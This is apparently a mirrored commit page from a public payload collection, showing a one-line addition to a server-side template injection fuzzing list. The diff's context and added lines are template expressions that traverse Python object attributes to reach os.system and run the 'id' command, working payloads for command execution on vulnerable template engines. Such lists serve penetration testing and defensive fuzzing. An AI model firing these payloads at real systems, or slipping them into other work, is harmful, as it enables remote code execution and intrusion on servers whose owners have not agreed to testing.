mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-13 00:17:17 +00:00
Update ssti.fuzz
This commit is contained in:
parent
7f8f8216db
commit
3dec0dd66a
1 changed files with 1 additions and 0 deletions
|
@ -67,3 +67,4 @@ ${self.template.module.filters.compat.inspect.os.system("id")}
|
|||
${self.template.module.runtime.compat.inspect.os.system("id")}
|
||||
${self.module.filters.compat.inspect.linecache.os.system("id")}
|
||||
${self.module.runtime.compat.inspect.linecache.os.system("id")}
|
||||
${self.template.module.runtime.exceptions.util.os.system("id")}
|
||||
|
|
Loading…
Reference in a new issue